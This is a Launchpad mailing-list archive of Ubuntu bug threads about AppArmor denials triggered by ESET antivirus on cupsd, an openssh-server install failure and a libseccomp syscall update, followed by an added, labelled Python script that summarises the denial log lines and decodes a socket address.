comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-22 Thread Seth Arnold
Hello snapd friends, Edson has an antivirus tool that requires all
processes have write access to a unix domain socket. Adding a rule to
/etc/apparmor.d/abstractions/base addressed many profiles but not
snapd's snap-confine profile.

What's the mechanism for admins to add local rules to this file?

Thanks

** Also affects: snapd (Ubuntu)
   Importance: Undecided
   Status: New


[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-22 Thread Seth Arnold
Hi Edson.. so, the last idea I've got is:

  unix,

in /etc/apparmor.d/abstractions/base

Do the usual reload, and reboot if it worked, dance.

Thanks



Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-18 Thread Seth Arnold
On Mon, Feb 18, 2019 at 02:45:16PM -, Edson José dos Santos wrote:
> Line replaced successfully:
> 
> From: unix (connect, send, receive)
> peer=(addr="@2F746D702F65736574732E736F636B00*"),
> 
> To:   unix (connect, send, receive) peer = (addr = "@
> 2F746D702F65736574732E736F636B00 *"),

Ah, sorry, I am sleep deprived. The new line is:

  unix,

> At the moment of saving with: sudo /etc/init.d/apparmor reload the
> procedure failed and I could not copy the error message.

Thanks


Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-18 Thread Seth Arnold
On Mon, Feb 18, 2019 at 01:26:02PM -, Edson José dos Santos wrote:
> Is it the same correct procedure?
> 
> /etc/apparmor.d/abstractions/base file:
> 
> unix (connect, send, receive) peer = (addr = "@
> 2F746D702F65736574732E736F636B00 *")
> 
> Then sudo /etc/init.d/apparmor reload
> If that appeared to work fine, then reboot.

yes, same procedure :)

Thanks



[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-18 Thread Seth Arnold
Alright, I don't know why that line didn't work. Replace it with this
one:

  unix,

it's a lot more open than I'd like, but I don't know why the more
specific rule didn't work. So, let's try this.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions



[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-18 Thread Seth Arnold
Hello Edson,

Are all those messages after adding this rule to your abstractions/base?

unix (connect, send, receive) peer=(addr="@2F746D702F65736574732E736F636B00*"),

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', '/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: /etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
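
Added example (not part of the original thread or of AppArmor's tooling): a small triage script for the `dmesg | grep DENIED` output discussed in this bug. It rejoins records that were wrapped by e-mail, groups denials by profile, operation, path and mask, and decodes the hex-encoded socket address from the suggested unix rule. The function names are hypothetical; the sample records are four of the lines from the bug description above.

```python
import re
from collections import defaultdict

# Four records from the bug description, kept in their e-mail-wrapped form.
WRAPPED_DMESG = """\
  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED"
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED"
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED"
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED"
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
"""

# A kernel log record starts with a "[ seconds.micros]" timestamp.
RECORD_START = re.compile(r"^\[\s*\d+\.\d+\]")
# key=value pairs; values are either double-quoted or a bare token.
KEY_VALUE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def rejoin_records(text):
    """Merge continuation lines back into one string per kernel log record."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if RECORD_START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records


def parse_denial(record):
    """Return the record's fields as a dict, or None if it is not a denial."""
    fields = {key: value.strip('"') for key, value in KEY_VALUE.findall(record)}
    return fields if fields.get("apparmor") == "DENIED" else None


def summarize(text):
    """Group denials so a flood of records collapses to the distinct accesses."""
    groups = defaultdict(lambda: {"count": 0, "comms": set(), "fsuids": set()})
    for record in rejoin_records(text):
        denial = parse_denial(record)
        if denial is None:
            continue
        key = (denial.get("profile"), denial.get("operation"),
               denial.get("name"), denial.get("denied_mask"))
        groups[key]["count"] += 1
        groups[key]["comms"].add(denial.get("comm"))
        groups[key]["fsuids"].add(denial.get("fsuid"))
    return dict(groups)


def decode_abstract_addr(addr):
    """Decode a hex-encoded abstract unix socket address such as the one in
    the rule above. A leading '@' and a trailing glob '*' are tolerated.
    Values that are not pure hex are returned unchanged; a printable name
    that happens to consist only of hex digits would be mis-decoded."""
    body = addr.lstrip("@").rstrip("*")
    if not re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", body):
        return addr
    raw = bytes.fromhex(body)
    return "@" + raw.decode("ascii", "backslashreplace").replace("\x00", "\\0")


if __name__ == "__main__":
    for key, info in summarize(WRAPPED_DMESG).items():
        print(key, info["count"], sorted(info["comms"]), sorted(info["fsuids"]))
    print(decode_abstract_addr("@2F746D702F65736574732E736F636B00*"))
```

Every record in the sample collapses to a single denied access (a read of /etc/ld.so.preload under the cupsd profile), and the address in the unix rule decodes to an abstract socket named /tmp/esets.sock followed by a NUL byte.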


[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-15 Thread Seth Arnold
Hello Edson, thanks for the reply; can you re-run this command and paste
back the results?

dmesg | grep DENIED

Thanks



[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-15 Thread Seth Arnold
Hello Edson,

Please add these lines to your /etc/apparmor.d/abstractions/base file:

  /etc/opt/eset/  r,
  /etc/opt/eset/** r,
  /opt/eset/esets/lib/** mr,
  unix (connect, send, receive) peer=(addr="@2F746D702F65736574732E736F636B00*"),

Then sudo /etc/init.d/apparmor reload
If that appeared to work fine, then reboot.

I expect we'll probably see more once you've done these.

Thanks



[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-15 Thread Seth Arnold
Hello Edson, what's the output of:

dmesg | grep DENIED

Thanks



[Touch-packages] [Bug 1816016] Re: package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

2019-02-15 Thread Seth Arnold
This message in your logs indicates that your system is improperly
configured:

WARN: uid is 0 but '/' is owned by 1000

I suggest heading to #ubuntu on irc.freenode.net or
https://askubuntu.com to ask for help from someone. If you go to
askubuntu, be sure to paste in the output of ls -l / .

Thanks

** Changed in: openssh (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1816016

Title:
  package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  Invalid

Bug description:
  Ubuntu 16.04.5 LTS

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.7
  ProcVersionSignature: Ubuntu 4.4.0-133.159-generic 4.4.134
  Uname: Linux 4.4.0-133-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Fri Feb 15 09:37:58 2019
  ErrorMessage: subprocess installed post-installation script returned error exit status 1
  InstallationDate: Installed on 2014-08-15 (1644 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.7 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: Upgraded to xenial on 2018-09-16 (151 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1816016/+subscriptions



[Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

2019-02-12 Thread Seth Arnold
Thanks Christian, very thorough.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1815415

Title:
  please update libseccomp for newer kernel syscalls

Status in libseccomp package in Ubuntu:
  Fix Released
Status in libseccomp source package in Bionic:
  In Progress
Status in libseccomp source package in Cosmic:
  Fix Released

Bug description:
  [Impact]

   * The libseccomp library provides an easy to use, platform independent,
     interface to the Linux Kernel's syscall filtering mechanism. But it can
     only "control" those syscalls it knows about. Therefore staying up to
     date with newer kernels is a requirement to be fully functional.

   * At the time 18.04 was released with the 4.15 kernel the new definitions
     were not yet released for libseccomp - let's fix this mismatch by
     backporting the new syscall definitions [2][3][4].

  [Test Case]

   * Note: a lot of this is kernel dependent; it should work with the
     intended SRU target of Bionic with kernel 4.15 or 4.18, but be careful
     to run it there (e.g. not a LXD container on Xenial's 4.4 kernel)

   * we modify the already existing autopkgtest for this SRU
     verification

  # Prep
  $ apt install ubuntu-dev-tools build-essential linux-libc-dev libseccomp-dev libseccomp2 seccomp
  $ pull-lp-source libseccomp bionic
  $ cd libseccomp-2.3.1
  $ export ADTTMP=$(mktemp -d); echo $ADTTMP
  # run original tests as-is (should pass/fail as expected)
  $ ./debian/tests/test-filter
  # add new syscalls of this SRU
  $ cp debian/tests/data/safe.filter debian/tests/data/newcodes.filter
  $ printf "preadv2\npwritev2\npkey_mprotect\npkey_alloc\npkey_free\nget_tls\ns390_guarded_storage\ns390_sthyi\n" >> debian/tests/data/newcodes.filter
  # remove unknown calls (x86 4.18 kernel)
  $ sed -i -e '/^_exit$/d' -e '/^fstatvfs$/d' -e '/^llseek$/d' -e '/^pread$/d' -e '/^pselect$/d' -e '/^pwrite$/d' -e '/^sigtimedwait$/d' -e '/^sigwaitinfo$/d' -e '/^statvfs$/d' debian/tests/data/newcodes.filter
  # make unknown call a fail
  $ sed -i -e '111s/continue;/{fprintf(stderr, "failed to find %s\\n",buf);rc = -1;goto out;}/' debian/tests/src/test-seccomp.c
  # run this special test and check return value
  $ ${ADTTMP}/exe ./debian/tests/data/newcodes.filter /bin/date; echo $?

  Without the fix it will fail like:
  DEBUG: seccomp_load_filters ./debian/tests/data/newcodes.filter
  failed to find preadv2
  seccomp_load_filters failed with -1
  1

  But with the fix applied those new calls will work:
  DEBUG: seccomp_load_filters ./debian/tests/data/newcodes.filter
  Tue Feb 12 07:41:05 UTC 2019
  0

  
  [Regression Potential]

   * This isn't adding new active code like functions, but only extending
     the definitions of per-arch syscall numbers to be aware of the newer
     syscalls that were added in the kernel. Therefore no old use-cases
     should regress (they are not touched). The only change in behavior for
     an SRU POV would be that things that got denied so far (e.g. if you
     tried to set such a new syscall through libseccomp) was denied before
     and would now work. I think that is exactly the intention of the SRU
     and not a regression.

  [Other Info]

   * Requested while security reviewing a libseccomp SRU to have one update
     for both [1].
   * we also missed the former update for kernel 4.9 [3] AND 4.10 [4] as the
     official releases of the lib are rather seldom.
   * In general there already are build time tests and autopkgtests in the
     package already. So coverage of "old calls" for regressions is already
     good.

  ---

  This came up while working on bug 1755250 which asked for statx.
  But on the review of that it was pointed out [1] that it would be great to
  support further new kernel syscall defines - this isn't even looking at HWE
  kernels for Bionic, but "just" adding those which are there for the 4.15
  kernel Bionic was released with.
  With the HWE kernels in mind there would be even more one might want to add,
  but there is no newer such update in the upstream repo yet.

  [1]: https://code.launchpad.net/~paelzer/ubuntu/+source/libseccomp/+git/libseccomp/+merge/362906/comments/944418
  [2]: https://github.com/seccomp/libseccomp/commit/c842c2f6c203ad9da37ca60219172aa0be68d26a
  [3]: https://github.com/seccomp/libseccomp/commit/d9102f12fd39bd77151a1f630fcfc8c80f86c55c
  [4]: https://github.com/seccomp/libseccomp/commit/116b3c1a2e1db53cc35b74f30c080f5265faa674

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1815415/+subscriptions



Re: [Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

2019-02-11 Thread Seth Arnold
On Mon, Feb 11, 2019 at 07:38:28AM -, Christian Ehrhardt  wrote:
> @Seth / @Tyler - Hi, you asked for the change, but I'd want to ask for
> something as well :-) Do you have any testcases from your security work
> that we could reuse here to check the SRU for SRU verification?

It doesn't look like we do; we've got some kernel-level seccomp filter checks
in place for testing the kernel, but these use prctl(2) directly.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1815415

Title:
  please update libseccomp for newer kernel syscalls

Status in libseccomp package in Ubuntu:
  Fix Released
Status in libseccomp source package in Bionic:
  Triaged
Status in libseccomp source package in Cosmic:
  Fix Released



[Touch-packages] [Bug 1815415] Re: please update libseccomp for newer kernel syscalls

2019-02-11 Thread Seth Arnold
Sorry about the question about s390 syscalls in unrelated syscall
tables; that patch accurately reflected upstream's code.

Looks good to me, thanks.


